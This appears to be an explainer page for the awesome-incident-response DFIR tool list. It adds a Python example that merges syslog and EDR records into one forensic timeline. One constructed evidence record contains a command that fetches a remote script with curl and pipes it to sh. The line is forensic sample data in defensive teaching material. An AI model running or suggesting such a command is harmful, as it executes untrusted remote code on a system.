explaingit

meirwah/awesome-incident-response

9,032 · Audience: ops, devops · Complexity: 1/5 · Setup: easy

TLDR

A curated list of tools and resources for Digital Forensics and Incident Response (DFIR), covering disk imaging, memory analysis, log parsing, sandboxing, and more, with sections for Linux, macOS, and Windows.

Mindmap

mindmap
  root((awesome-incident-response))
    Evidence Collection
      Disk imaging
      Memory snapshots
      Live systems
    Analysis
      Log parsing
      Timeline building
      Sandboxes
    Platforms
      GRR Rapid Response
      IRIS
    OS-specific
      Linux tools
      macOS tools
      Windows tools
    Learning
      Books
      Videos


Things people build with this

USE CASE 1

Find the right open-source forensics tool for your incident response workflow by browsing organized categories.

USE CASE 2

Set up an evidence collection toolkit for investigating compromised Linux, macOS, or Windows systems.

USE CASE 3

Learn adversary emulation to test your organization's detection and response capabilities in a controlled environment.

USE CASE 4

Build a reading list of books and videos for learning DFIR concepts from scratch.

Getting it running

Difficulty · easy · Time to first run · 5 min

In plain English

Awesome Incident Response is a curated list of tools and resources for Digital Forensics and Incident Response, a field commonly abbreviated as DFIR. When an organization discovers a potential security breach, DFIR teams are responsible for investigating what happened, collecting evidence, containing the damage, and putting controls in place to prevent recurrence. This list aims to give those teams a starting point for finding the right software.

The list is organized into more than twenty categories. These include tools for imaging disks, collecting evidence from live systems, analyzing memory snapshots, parsing and searching log files, building timelines of events, and running suspicious files inside sandboxes. There are separate sections for tools specific to Linux, macOS, and Windows evidence collection. A category called adversary emulation covers tools for simulating attacker behavior in a controlled environment, which teams use to test their own detection and response capabilities.

There is also a smaller set of all-in-one platforms that combine multiple forensic and case management functions into a single interface, such as GRR Rapid Response for remote live forensics and IRIS, a web-based platform for sharing investigations among analysts.

Most entries are links to open-source projects on GitHub with a one-line description. Some entries point to commercial tools. A short reading list of books and a video section for learning DFIR concepts are also included.

The list follows the standard awesome-list README format, which means it is easy to browse but does not include ratings or last-maintained dates. Links are checked for validity automatically via a GitHub Actions workflow. The full README is longer than the portion summarized here.
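The "log parsing" and "timeline building" categories the summary mentions are about one recurring task: normalizing timestamps from several evidence sources onto a single clock so that an analyst can read events in order. The following is an added example, not code from the awesome-incident-response repository or any tool it lists. It builds a unified timeline from two constructed sources: syslog lines (which omit the year, so the caller supplies it from the acquisition date, and which are assumed here to be in UTC) and an EDR-style JSON-lines export with ISO 8601 timestamps. The log lines, hostnames, addresses and the "edr" source name are all constructed for the example.

```python
"""Added example: merge syslog and JSON-lines EDR evidence into one
UTC-ordered timeline. Not part of the awesome-incident-response repo."""
import json
import re
from datetime import datetime, timezone

# Constructed syslog evidence. Syslog has no year field, so the
# collector must supply it (taken from the acquisition date). The host
# clock is assumed to be UTC; on a real case, record the host's
# timezone and clock skew before merging.
SYSLOG_LINES = [
    "Mar  3 02:17:41 web01 sshd[2211]: Accepted password for deploy from 203.0.113.7 port 51822 ssh2",
    "Mar  3 02:17:43 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/bash",
    "Mar  3 02:19:05 web01 systemd[1]: Started cron.service.",
]

# Constructed EDR export, one JSON object per line, ISO 8601 UTC timestamps.
EDR_LINES = [
    '{"ts": "2024-03-03T02:18:10Z", "host": "web01", "event": "process_start", "cmd": "curl -s http://198.51.100.9/x.sh | sh"}',
    '{"ts": "2024-03-03T02:18:12Z", "host": "web01", "event": "file_write", "path": "/tmp/.x/kd"}',
]

SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<proc>[^:]+): (?P<msg>.*)$"
)


def parse_syslog(line, year):
    """Parse a classic syslog line; return None for lines that do not match."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(
        f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S"
    ).replace(tzinfo=timezone.utc)  # assumption: host clock is UTC
    return {"ts": ts, "host": m["host"], "source": "syslog",
            "event": m["proc"], "detail": m["msg"].strip()}


def parse_edr(line):
    """Parse one JSON-lines record; 'Z' is rewritten so older Pythons accept it."""
    d = json.loads(line)
    ts = datetime.fromisoformat(d["ts"].replace("Z", "+00:00")).astimezone(timezone.utc)
    return {"ts": ts, "host": d["host"], "source": "edr",
            "event": d["event"], "detail": d.get("cmd") or d.get("path") or ""}


def build_timeline(syslog_lines, edr_lines, syslog_year):
    """Return all events from both sources sorted by UTC timestamp.

    sort() is stable, so events with identical timestamps keep their
    source order, which matters when an analyst later diffs two runs.
    """
    events = []
    for line in syslog_lines:
        e = parse_syslog(line, syslog_year)
        if e is not None:
            events.append(e)
    for line in edr_lines:
        events.append(parse_edr(line))
    events.sort(key=lambda e: e["ts"])
    return events


def format_line(e):
    """Render one event in the fixed-width form used for review and diffing."""
    return (f"{e['ts'].strftime('%Y-%m-%dT%H:%M:%SZ')} {e['host']} "
            f"{e['source']} {e['event']} {e['detail']}")


if __name__ == "__main__":
    for ev in build_timeline(SYSLOG_LINES, EDR_LINES, 2024):
        print(format_line(ev))
```

Read in order, the merged output shows the SSH login, the sudo to root, the curl-pipe-shell process start and the file write in /tmp, then the cron restart: the sequence is only visible once both sources sit on one clock. On real evidence, also record each source's timezone and any clock drift, and hash the raw log files before parsing so the timeline can be traced back to unaltered inputs.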

Copy-paste prompts

Prompt 1
I need to analyze memory from a compromised Linux server. Using the awesome-incident-response tool list as a guide, which tools should I use and how do I get started with memory forensics?
Prompt 2
Help me build an incident response toolkit using open-source tools from awesome-incident-response. Recommend tools for disk imaging, log analysis, and building a timeline of events.
Prompt 3
I want to set up adversary emulation to test my team's detection capabilities. Which tools from the awesome-incident-response list are best for simulating attacker behavior safely?
Prompt 4
I am responding to a Windows security incident. Based on the awesome-incident-response list, what tools should I use for evidence collection and what order should I work in?


Verify against the repo before relying on details.